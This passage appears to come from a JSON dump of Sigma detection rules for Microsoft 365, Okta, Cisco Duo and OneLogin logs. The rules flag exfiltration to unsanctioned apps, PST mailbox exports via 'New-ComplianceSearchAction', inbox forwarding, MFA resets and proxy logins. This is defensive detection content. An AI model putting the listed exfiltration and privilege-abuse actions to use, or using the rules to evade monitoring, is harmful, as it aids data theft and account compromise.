    "content": "title: Activity Performed by Terminated User\nid: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee\nstatus: test\ndescription: |\n  Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\n  This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity performed by terminated user'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml",
    "content": "title: Activity from Anonymous IP Addresses\nid: d8b0a4fe-07a8-41be-bd39-b14afa025d95\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity from anonymous IP addresses'\n        status: success\n    condition: selection\nfalsepositives:\n    - User using a VPN or Proxy\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml",
    "content": "title: Activity from Infrequent Country\nid: 0f2468a2-5055-4212-a368-7321198ee706\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity from infrequent country'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml",
    "content": "title: Data Exfiltration to Unsanctioned Apps\nid: 2b669496-d215-47d8-bd9a-f4a45bf07cda\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Data exfiltration to unsanctioned apps'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml",
    "content": "title: Microsoft 365 - Impossible Travel Activity\nid: d7eab125-5f94-43df-8710-795b80fa1189\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2020-07-06\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Impossible travel activity'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml",
    "content": "title: Logon from a Risky IP Address\nid: c191e2fa-f9d6-4ccf-82af-4f2aba08359f\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Log on from a risky IP address'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml",
    "content": "title: Microsoft 365 - Potential Ransomware Activity\nid: bd132164-884a-48f1-aa2d-c6d646b04c69\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: austinsonger\ndate: 2021-08-19\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Potential ransomware activity'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml",
    "content": "title: PST Export Alert Using eDiscovery Alert\nid: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0\nrelated:\n    - id: 6897cd82-6664-11ed-9022-0242ac120002\n      type: similar\nstatus: test\ndescription: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content\nreferences:\n    - https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide\nauthor: Sorina Ionescu\ndate: 2022-02-08\nmodified: 2022-11-17\ntags:\n    - attack.collection\n    - attack.t1114\nlogsource:\n    service: threat_management\n    product: m365\n    definition: Requires the 'eDiscovery search or exported' alert to be enabled\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'eDiscovery search started or exported'\n        status: success\n    condition: selection\nfalsepositives:\n    - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml",
    "content": "title: PST Export Alert Using New-ComplianceSearchAction\nid: 6897cd82-6664-11ed-9022-0242ac120002\nrelated:\n    - id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0\n      type: similar\nstatus: test\ndescription: Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps\nauthor: Nikita Khalimonenkov\ndate: 2022-11-17\ntags:\n    - attack.collection\n    - attack.t1114\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        Payload|contains|all:\n            - 'New-ComplianceSearchAction'\n            - 'Export'\n            - 'pst'\n    condition: selection\nfalsepositives:\n    - Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml",
    "content": "title: Suspicious Inbox Forwarding\nid: 6c220477-0b5b-4b25-bb90-66183b4089e8\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-22\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Suspicious inbox forwarding'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml",
    "content": "title: Suspicious OAuth App File Download Activities\nid: ee111937-1fe7-40f0-962a-0eb44d57d174\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Suspicious OAuth app file download activities'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml",
    "content": "title: Microsoft 365 - Unusual Volume of File Deletion\nid: 78a34b67-3c39-4886-8fb4-61c46dc18ecd\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: austinsonger\ndate: 2021-08-19\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Unusual volume of file deletion'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml",
    "content": "title: Microsoft 365 - User Restricted from Sending Email\nid: ff246f56-7f24-402a-baca-b86540e3925c\nstatus: test\ndescription: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: austinsonger\ndate: 2021-08-19\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.t1199\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'User restricted from sending email'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/cisco_duo/cisco_duo_mfa_bypass_via_bypass_code.yml",
    "content": "title: Cisco Duo Successful MFA Authentication Via Bypass Code\nid: 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8\nstatus: test\ndescription: |\n    Detects when a successful MFA authentication occurs due to the use of a bypass code.\n    A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as \"backup codes,\" so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.\nreferences:\n    - https://duo.com/docs/adminapi#logs\n    - https://help.duo.com/s/article/6327?language=en_US\nauthor: Nikita Khalimonenkov\ndate: 2024-04-17\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.initial-access\nlogsource:\n    product: cisco\n    service: duo\ndetection:\n    selection:\n        event_type: authentication\n        reason: bypass_user\n    condition: selection\nfalsepositives:\n    - Legitimate user that was assigned on purpose to a bypass group\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_admin_activity_from_proxy_query.yml",
    "content": "title: Okta Admin Functions Access Through Proxy\nid: 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309\nstatus: test\ndescription: Detects access to Okta admin functions through proxy.\nreferences:\n    - https://www.beyondtrust.com/blog/entry/okta-support-unit-breach\n    - https://dataconomy.com/2023/10/23/okta-data-breach/\n    - https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/\nauthor: Muhammad Faisal @faisalusuf\ndate: 2023-10-25\ntags:\n    - attack.credential-access\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        debugContext.debugData.requestUri|contains: 'admin'\n        securityContext.isProxy: 'true'\n    condition: selection\nfalsepositives:\n    - False positives are expected if administrators access these function through proxy legitimatly. Apply additional filters if necessary\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_admin_role_assigned_to_user_or_group.yml",
    "content": "title: Okta Admin Role Assigned to an User or Group\nid: 413d4a81-6c98-4479-9863-014785fd579c\nstatus: test\ndescription: Detects when an the Administrator role is assigned to an user or group.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.003\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - group.privilege.grant\n            - user.account.privilege.grant\n    condition: selection\nfalsepositives:\n    - Administrator roles could be assigned to users or group by other admin users.\n\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_admin_role_assignment_created.yml",
    "content": "title: Okta Admin Role Assignment Created\nid: 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c\nstatus: test\ndescription: Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Nikita Khalimonenkov\ndate: 2023-01-19\ntags:\n    - attack.persistence\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'iam.resourceset.bindings.add'\n    condition: selection\nfalsepositives:\n    - Legitimate creation of a new admin role assignment\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_api_token_created.yml",
    "content": "title: Okta API Token Created\nid: 19951c21-229d-4ccb-8774-b993c3ff3c5c\nstatus: test\ndescription: Detects when a API token is created\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.persistence\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: system.api_token.create\n    condition: selection\nfalsepositives:\n    - Legitimate creation of an API token by authorized users\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_api_token_revoked.yml",
    "content": "title: Okta API Token Revoked\nid: cf1dbc6b-6205-41b4-9b88-a83980d2255b\nstatus: test\ndescription: Detects when a API Token is revoked.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: system.api_token.revoke\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_application_modified_or_deleted.yml",
    "content": "title: Okta Application Modified or Deleted\nid: 7899144b-e416-4c28-b0b5-ab8f9e0a541d\nstatus: test\ndescription: Detects when an application is modified or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - application.lifecycle.update\n            - application.lifecycle.delete\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_application_sign_on_policy_modified_or_deleted.yml",
    "content": "title: Okta Application Sign-On Policy Modified or Deleted\nid: 8f668cc4-c18e-45fe-ad00-624a981cf88a\nstatus: test\ndescription: Detects when an application Sign-on Policy is modified or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - application.policy.sign_on.update\n            - application.policy.sign_on.rule.delete\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_fastpass_phishing_detection.yml",
    "content": "title: Okta FastPass Phishing Detection\nid: ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e\nstatus: test\ndescription: Detects when Okta FastPass prevents a known phishing site.\nreferences:\n    - https://sec.okta.com/fastpassphishingdetection\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2023-05-07\ntags:\n    - attack.initial-access\n    - attack.t1566\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        outcome.reason: 'FastPass declined phishing attempt'\n        outcome.result: FAILURE\n        eventtype: user.authentication.auth_via_mfa\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_identity_provider_created.yml",
    "content": "title: Okta Identity Provider Created\nid: 969c7590-8c19-4797-8c1b-23155de6e7ac\nstatus: test\ndescription: Detects when a new identity provider is created for Okta.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nauthor: kelnage\ndate: 2023-09-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.001\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'system.idp.lifecycle.create'\n    condition: selection\nfalsepositives:\n    - When an admin creates a new, authorised identity provider.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_mfa_reset_or_deactivated.yml",
    "content": "title: Okta MFA Reset or Deactivated\nid: 50e068d7-1e6b-4054-87e5-0a592c40c7e0\nstatus: test\ndescription: Detects when an attempt at deactivating  or resetting MFA.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-21\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1556.006\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - user.mfa.factor.deactivate\n            - user.mfa.factor.reset_all\n    condition: selection\nfalsepositives:\n    - If a MFA reset or deactivated was performed by a system administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_network_zone_deactivated_or_deleted.yml",
    "content": "title: Okta Network Zone Deactivated or Deleted\nid: 9f308120-69ed-4506-abde-ac6da81f4310\nstatus: test\ndescription: Detects when an Network Zone is Deactivated or Deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - zone.deactivate\n            - zone.delete\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_new_behaviours_admin_console.yml",
    "content": "title: Okta New Admin Console Behaviours\nid: a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9\nstatus: test\ndescription: Detects when Okta identifies new activity in the Admin Console.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nauthor: kelnage\ndate: 2023-09-07\nmodified: 2024-06-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection_event:\n        eventtype: 'policy.evaluate_sign_on'\n        target.displayname: 'Okta Admin Console'\n    selection_positive:\n        - debugcontext.debugdata.behaviors|contains: 'POSITIVE'\n        - debugcontext.debugdata.logonlysecuritydata|contains: 'POSITIVE'\n    condition: all of selection_*\nfalsepositives:\n    - When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual.\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_password_in_alternateid_field.yml",
    "content": "title: Potential Okta Password in AlternateID Field\nid: 91b76b84-8589-47aa-9605-c837583b82a9\nstatus: test\ndescription: |\n    Detects when a user has potentially entered their password into the\n    username field, which will cause the password to be retained in log files.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data\n    - https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm\nauthor: kelnage\ndate: 2023-04-03\nmodified: 2023-10-25\ntags:\n    - attack.credential-access\n    - attack.t1552\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        legacyeventtype: 'core.user_auth.login_failed'\n    filter_main:\n        # Okta service account names start with 0oa\n        # Email addresses are the default format for Okta usernames, so attempt\n        # to exclude alternateIds that look like valid emails\n        # If your Okta configuration uses different character restrictions, you\n        # will need to update this regular expression to reflect that or disable the rule for your environment\n        # Possible false negatives are failed login attempts with a password that looks like a valid email address\n        actor.alternateid|re: '(^0oa.*|[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,10})'\n    condition: selection and not filter_main\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_policy_modified_or_deleted.yml",
    "content": "title: Okta Policy Modified or Deleted\nid: 1667a172-ed4c-463c-9969-efd92195319a\nstatus: test\ndescription: Detects when an Okta policy is modified or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - policy.lifecycle.update\n            - policy.lifecycle.delete\n    condition: selection\nfalsepositives:\n    - Okta Policies being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/identity/okta/okta_policy_rule_modified_or_deleted.yml",
    "content": "title: Okta Policy Rule Modified or Deleted\nid: 0c97c1d3-4057-45c9-b148-1de94b631931\nstatus: test\ndescription: Detects when an Policy Rule is Modified or Deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - policy.rule.update\n            - policy.rule.delete\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_security_threat_detected.yml",
    "content": "title: Okta Security Threat Detected\nid: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0\nstatus: test\ndescription: Detects when an security threat is detected in Okta.\nreferences:\n    - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: security.threat.detected\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_suspicious_activity_enduser_report.yml",
    "content": "title: Okta Suspicious Activity Reported by End-user\nid: 07e97cc6-aed1-43ae-9081-b3470d2367f1\nstatus: test\ndescription: Detects when an Okta end-user reports activity by their account as being potentially suspicious.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md\nauthor: kelnage\ndate: 2023-09-07\ntags:\n    - attack.resource-development\n    - attack.t1586.003\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'user.account.report_suspicious_activity_by_enduser'\n    condition: selection\nfalsepositives:\n    - If an end-user incorrectly identifies normal activity as suspicious.\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_unauthorized_access_to_app.yml",
    "content": "title: Okta Unauthorized Access to App\nid: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657\nstatus: test\ndescription: Detects when unauthorized access to app occurs.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        displaymessage: User attempted unauthorized access to app\n    condition: selection\nfalsepositives:\n    - User might of believe that they had access.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_user_account_locked_out.yml",
    "content": "title: Okta User Account Locked Out\nid: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a\nstatus: test\ndescription: Detects when an user account is locked out.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        displaymessage: Max sign in attempts exceeded\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_user_created.yml",
    "content": "title: New Okta User Created\nid: b6c718dd-8f53-4b9f-98d8-93fdca966969\nstatus: test\ndescription: Detects new user account creation\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\nreferences:\n    - https://developer.okta.com/docs/reference/api/event-types/\ntags:\n    - attack.credential-access\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        eventtype: 'user.lifecycle.create'\n    condition: selection\nfalsepositives:\n    - Legitimate and authorized user creation\nlevel: informational\n"
  },
  {
    "path": "rules/identity/okta/okta_user_session_start_via_anonymised_proxy.yml",
    "content": "title: Okta User Session Start Via An Anonymising Proxy Service\nid: bde30855-5c53-4c18-ae90-1ff79ebc9578\nstatus: test\ndescription: Detects when an Okta user session starts where the user is behind an anonymising proxy service.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nauthor: kelnage\ndate: 2023-09-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.006\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'user.session.start'\n        securitycontext.isproxy: 'true'\n    condition: selection\nfalsepositives:\n    - If a user requires an anonymising proxy due to valid justifications.\nlevel: high\n"
  },
  {
    "path": "rules/identity/onelogin/onelogin_assumed_another_user.yml",
    "content": "title: OneLogin User Assumed Another User\nid: 62fff148-278d-497e-8ecd-ad6083231a35\nstatus: test\ndescription: Detects when an user assumed another user account.\nreferences:\n    - https://developers.onelogin.com/api-docs/1/events/event-resource\nauthor: Austin Songer @austinsonger\ndate: 2021-10-12\nmodified: 2022-12-25\ntags:\n    - attack.impact\nlogsource:\n    product: onelogin\n    service: onelogin.events\ndetection:\n    selection:\n        event_type_id: 3\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/identity/onelogin/onelogin_user_account_locked.yml",
